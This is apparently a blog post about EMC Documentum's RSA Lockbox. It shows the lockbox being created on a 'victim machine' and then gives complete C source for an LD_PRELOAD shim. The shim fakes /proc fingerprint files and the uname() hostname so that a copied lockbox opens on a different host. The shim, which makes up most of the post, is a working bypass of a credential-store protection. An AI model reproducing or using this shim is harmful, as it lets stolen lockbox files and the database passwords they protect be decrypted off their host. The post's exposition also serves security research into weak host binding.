RSA Lockbox magic :)

As was promised previously

Preparing RSA Lockbox on the victim machine (note that both passphrases are passed on the command line, so they land in the shell history and are visible to every local user via ps for as long as the tool runs):

[dmadmin@docu72cs dba]$ dm_crypto_create -lockbox lockbox.lb \
> -lockboxpassphrase WSX@234edc \
> -keyname CSaek -passphrase QAZ123wsx

** Will use default algorithm **

Please wait. This will take a few seconds ...
** Successfully created key store 
     /u01/documentum/dba/secure/CSaek using algorithm AES_128_CBC
Key - CSaek uses algorithm AES_128_CBC.

Lockbox: Created /u01/documentum/dba/secure/lockbox.lb.
Created key CSaek


[dmadmin@docu72cs dba]$ ipcs

------ Shared Memory Segments --------
key        shmid      owner      perms      bytes      nattch     status
0x000005d1 807206912  dmadmin    640        1024       0

------ Semaphore Arrays --------
key        semid      owner      perms      nsems

------ Message Queues --------
key        msqid      owner      perms      used-bytes   messages



[dmadmin@docu72cs dba]$ dm_encrypt_password -lockbox lockbox.lb \
> -passphrase QAZ123wsx -keyname CSaek \
> -docbase D72 -rdbms -encrypt d72

** Successfully encrypted password in dbpasswd.txt file

[dmadmin@docu72cs dba]$ ./dm_start_D72
starting Documentum server for repository: [D72]
with server log: [/u01/documentum/dba/log/D72.log]
server pid: 4421

[dmadmin@docu72cs dba]$ head /u01/documentum/dba/log/D72.log
.... [DM_SERVER_I_START_SERVER]info:  "Docbase D72 attempting to open"

.... [DM_SERVER_I_START_KEY_STORAGE_MODE]info:  
         "Docbase D72 is using database for cryptographic key storage"

Opening RSA Lockbox on another machine. The lockbox evidently ties the key store to the host it was created on; the shim below (built as a shared object and meant to be loaded with LD_PRELOAD into the process that opens the lockbox) defeats that check by serving copies of /proc/version, /proc/swaps, /proc/cpuinfo and /proc/partitions from the directory named in $PROC_PATH and by reporting $FAKENAME as the uname() nodename. In other words, anyone who can copy lockbox.lb together with those four files and the hostname can open it elsewhere:

Related source code:

#define _GNU_SOURCE
#include <dlfcn.h>
#include <errno.h>
#include <fcntl.h>
#include <stdarg.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/utsname.h>

/* Pointers to the libc implementations that the interposers below wrap.
 * Both start out NULL (static storage is zero-initialised) and are resolved
 * lazily with dlsym(RTLD_NEXT, ...) on the first call. */
static int (*orig_open)(char *, int);
static int (*orig_uname)(struct utsname *) = NULL;


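/*
 * Interposed open(2).
 *
 * The four /proc files that the caller reads for its host fingerprint
 * (/proc/version, /proc/swaps, /proc/cpuinfo, /proc/partitions) are
 * redirected to copies living under the directory named by the PROC_PATH
 * environment variable; every other path, and every call made while
 * PROC_PATH is unset, is passed straight to the real open().
 *
 * Fixes relative to the previous version:
 *  - the real open() is variadic: O_CREAT callers pass a mode as a third
 *    argument, which the old two-argument signature silently dropped, so
 *    files were created with whatever garbage happened to be in the mode
 *    register.  The mode is now fetched with va_arg and forwarded.
 *  - the redirected path is built with snprintf instead of
 *    memset(ptr, 0, sizeof(ptr)) + strncat, which only zeroed the first
 *    sizeof(char *) bytes of the heap buffer before appending to it.
 *  - malloc() and dlsym() failures are reported instead of dereferenced,
 *    and a NULL filename is handed to the real open() (EFAULT) instead of
 *    being passed to strcmp().
 *
 * filename: path from the caller.
 * flags:    open(2) flags; when O_CREAT (or O_TMPFILE) is set a mode_t
 *           follows in the variadic list.
 * Returns the descriptor from the real open(), or -1 with errno set.
 */
int open(const char *filename, int flags, ...)
{
    typedef int (*open_fn)(const char *, int, ...);
    static open_fn real_open = NULL;
    static const char *const fingerprint_files[] = {
        "/proc/version",
        "/proc/swaps",
        "/proc/cpuinfo",
        "/proc/partitions",
    };
    mode_t mode = 0;
    int want_mode = (flags & O_CREAT) != 0;

#ifdef O_TMPFILE
    if ((flags & O_TMPFILE) == O_TMPFILE)
        want_mode = 1;
#endif
    if (want_mode) {
        /* glibc itself reads the mode as int; mode_t is promoted to int
         * (or stays unsigned int) on every Linux ABI, so this matches. */
        va_list ap;
        va_start(ap, flags);
        mode = (mode_t) va_arg(ap, int);
        va_end(ap);
    }

    if (real_open == NULL) {
        real_open = (open_fn) dlsym(RTLD_NEXT, "open");
        if (real_open == NULL) {
            errno = ENOSYS;
            return -1;
        }
    }

    /* Passing the mode unconditionally is harmless: the real open() only
     * looks at it when O_CREAT/O_TMPFILE is set. */
    if (filename == NULL)
        return real_open(filename, flags, mode);

    int redirect = 0;
    for (size_t i = 0; i < sizeof fingerprint_files / sizeof fingerprint_files[0]; i++) {
        if (strcmp(filename, fingerprint_files[i]) == 0) {
            redirect = 1;
            break;
        }
    }

    const char *root = getenv("PROC_PATH");
    if (!redirect || root == NULL)
        return real_open(filename, flags, mode);

    /* root + filename; filename is absolute so no separator is needed. */
    size_t len = strlen(root) + strlen(filename) + 1;
    char *redirected = malloc(len);
    if (redirected == NULL)
        return -1;                      /* errno = ENOMEM from malloc */
    snprintf(redirected, len, "%s%s", root, filename);

    int ret = real_open(redirected, flags, mode);
    int saved_errno = errno;            /* keep the open() errno across free() */
    free(redirected);
    errno = saved_errno;
    return ret;
}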

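/*
 * Interposed uname(2).
 *
 * Calls the real uname() and, when the FAKENAME environment variable is
 * set, overwrites buf->nodename with its value so that whatever the caller
 * derives from the hostname sees the name of the original host instead.
 * Everything else in buf is left as the real call filled it.
 *
 * Fixes relative to the previous version:
 *  - buf is only touched after the real uname() succeeded.  The old code
 *    memset() the buffer even when the kernel had rejected it, so
 *    uname(NULL) with FAKENAME set crashed instead of returning EFAULT.
 *  - the copy uses snprintf, which always NUL-terminates, instead of
 *    memset + strncpy.  Names longer than sizeof(buf->nodename) - 1 are
 *    truncated, as before.
 *  - a dlsym() failure is reported (ENOSYS) instead of being called as a
 *    NULL function pointer.
 *
 * buf: destination structure, as for uname(2).
 * Returns 0 on success, -1 with errno set on failure.
 */
int uname(struct utsname *buf)
{
    typedef int (*uname_fn)(struct utsname *);
    static uname_fn real_uname = NULL;

    if (real_uname == NULL) {
        real_uname = (uname_fn) dlsym(RTLD_NEXT, "uname");
        if (real_uname == NULL) {
            errno = ENOSYS;
            return -1;
        }
    }

    int ret = real_uname(buf);
    if (ret != 0)
        return ret;             /* leave errno and buf exactly as the real call did */

    const char *fakename = getenv("FAKENAME");
    if (fakename == NULL)
        return ret;

    /* snprintf always terminates the field; excess characters are dropped. */
    snprintf(buf->nodename, sizeof buf->nodename, "%s", fakename);
    return ret;
}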

4 thoughts on “RSA Lockbox magic :)

  1. Pingback: Encryption madness | Documentum in a (nuts)HELL
  2. Pingback: Weird release management | Documentum in a (nuts)HELL
  3. Pingback: Say goodbuy LockBox | Documentum in a (nuts)HELL
  4. Pingback: Say goodbuy LockBox. Part II | Documentum in a (nuts)HELL
